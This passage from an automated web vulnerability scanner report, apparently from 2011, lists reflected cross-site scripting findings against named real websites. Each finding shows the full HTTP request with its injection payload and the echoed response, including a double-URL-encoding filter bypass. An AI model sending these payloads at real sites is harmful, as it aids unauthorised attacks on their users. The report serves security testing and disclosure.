The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c874d"><script>alert(1)</script>742e151d0f9 was submitted in the search parameter. This input was echoed as c874d\"><script>alert(1)</script>742e151d0f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /hnl/pages/hnl_search2.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl.php?gclid=
Content-Length: 10
Cache-Control: max-age=0
Origin: http://www.harbottle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic

search=xssc874d"><script>alert(1)</script>742e151d0f9

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:44 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 11217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
<input type="text" name=search id="txt-search-fld" class="txt-search" value="xssc874d\"><script>alert(1)</script>742e151d0f9" />
...[SNIP]...

3.81. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 136b4><img%20src%3da%20onerror%3dalert(1)>d7f0728306f was submitted in the REST URL parameter 4. This input was echoed as 136b4><img src=a onerror=alert(1)>d7f0728306f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/136b4><img%20src%3da%20onerror%3dalert(1)>d7f0728306f?search=xss HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5152
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/136b4><img src=a onerror=alert(1)>d7f0728306f.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.82. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70e82<img%20src%3da%20onerror%3dalert(1)>070b3549546 was submitted in the REST URL parameter 4. This input was echoed as 70e82<img src=a onerror=alert(1)>070b3549546 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf70e82<img%20src%3da%20onerror%3dalert(1)>070b3549546?search=xss HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5219
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<img src=a onerror=prompt(document.location)>9d536909165a5febf70e82<img src=a onerror=alert(1)>070b3549546.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.83. http://www.harbottle.com/hnl/pages/hnl_search2.php/a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b2a8a><img%20src%3da%20onerror%3dalert(1)>2ab92f55609 was submitted in the REST URL parameter 4. This input was echoed as b2a8a><img src=a onerror=alert(1)>2ab92f55609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/ab2a8a><img%20src%3da%20onerror%3dalert(1)>2ab92f55609 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:25 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5153
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/ab2a8a><img src=a onerror=alert(1)>2ab92f55609.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.84. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Issue detail

The value of REST URL parameter 5 is copied into the name of an HTML tag attribute. The payload 7efde><img%20src%3da%20onerror%3dalert(1)>d1b7aafafe7 was submitted in the REST URL parameter 5. This input was echoed as 7efde><img src=a onerror=alert(1)>d1b7aafafe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg7efde><img%20src%3da%20onerror%3dalert(1)>d1b7aafafe7 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:26 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5179
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/Chambers 2011 Firm Logo.jpg7efde><img src=a onerror=alert(1)>d1b7aafafe7.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.85. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 1e850><img%20src%3da%20onerror%3dalert(1)>dd18401005a was submitted in the REST URL parameter 5. This input was echoed as 1e850><img src=a onerror=alert(1)>dd18401005a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/1e850><img%20src%3da%20onerror%3dalert(1)>dd18401005a HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:31 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5152
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/1e850><img src=a onerror=alert(1)>dd18401005a.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.86. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e2a6e><img%20src%3da%20onerror%3dalert(1)>39a70330b58 was submitted in the REST URL parameter 5. This input was echoed as e2a6e><img src=a onerror=alert(1)>39a70330b58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/e2a6e><img%20src%3da%20onerror%3dalert(1)>39a70330b58 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:31 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5152
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/e2a6e><img src=a onerror=alert(1)>39a70330b58.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.87. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Issue detail

The value of REST URL parameter 5 is copied into the name of an HTML tag attribute. The payload 17276><img%20src%3da%20onerror%3dalert(1)>abf137323f7 was submitted in the REST URL parameter 5. This input was echoed as 17276><img src=a onerror=alert(1)>abf137323f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif17276><img%20src%3da%20onerror%3dalert(1)>abf137323f7 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:26 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5165
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/L500 Logo.gif17276><img src=a onerror=alert(1)>abf137323f7.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.88. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/pubs/479

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed437b2915b was submitted in the REST URL parameter 4. This input was echoed as b38f5\"><script>alert(1)</script>ed437b2915b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /hnl/pages/pubs/479b38f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed437b2915b HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 12483

<p><font color=red><b>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"><script>alert(1)</script>ed437b29
...[SNIP]...
<img src="pix/headers/Publications.jpg" alt="banner image - Publications1055:479b38f5\"><script>alert(1)</script>ed437b2915b" />
...[SNIP]...

3.89. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/pubs/479

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 345e0%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef416c8577e6 was submitted in the REST URL parameter 4. This input was echoed as 345e0--><script>alert(1)</script>f416c8577e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /hnl/pages/pubs/479345e0%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef416c8577e6 HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:18 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 12502

<p><font color=red><b>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>alert(1)</script>f416c8577e
...[SNIP]...
<!-- contact box 1055 479345e0--><script>alert(1)</script>f416c8577e6 -->
...[SNIP]...

3.90. http://www.linkedin.com/countserv/count/share [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 25dc9<img%20src%3da%20onerror%3dalert(1)>4460fcf0bcf was submitted in the url parameter. This input was echoed as 25dc9<img src=a onerror=alert(1)>4460fcf0bcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php25dc9<img%20src%3da%20onerror%3dalert(1)>4460fcf0bcf HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:33:10 GMT
Content-Length: 155

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.readwriteweb.com\/enterprise\/2010\/11\/oracle.php25dc9<img src=a onerror=alert(1)>4460fcf0bcf"});

3.91. http://www.sapient.com/en-us/search.html [search parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /en-us/search.html

Issue detail

The value of the search request parameter is copied into the name of an HTML tag attribute. The payload 71cf5%20style%3dx%3aexpression(alert(1))%20041bb562a4a was submitted in the search parameter. This input was echoed as 71cf5 style=x:expression(alert(1)) 041bb562a4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /en-us/search.html?search=xss%20contact%20faq%20phone71cf5%20style%3dx%3aexpression(alert(1))%20041bb562a4a HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/search.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.3.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; locale=en-us

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:49 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45804


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a title'Next' href=/en-us/search.html?search=xss contact faq phone71cf5 style=x:expression(alert(1)) 041bb562a4a&PageIndex=2>
...[SNIP]...

3.92. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c9c69<script>alert(1)</script>856d1048244 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: c9c69<script>alert(1)</script>856d1048244
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:33:18 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: c9c69<script>alert(1)</script>856d1048244

3.93. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e053a"-alert(1)-"60aad715d99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=4749&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e053a"-alert(1)-"60aad715d99
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A5B13C6DD2625ADC8DB86B9CC1C99F3C; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=e053a"-alert(1)-"60aad715d99",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749&campId=176996",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000"
...[SNIP]...

3.94. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6451/11953/20435-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 685de"-alert(1)-"60e51d37b2a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6451/11953/20435-15.js?cb=0.7766812939662486&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
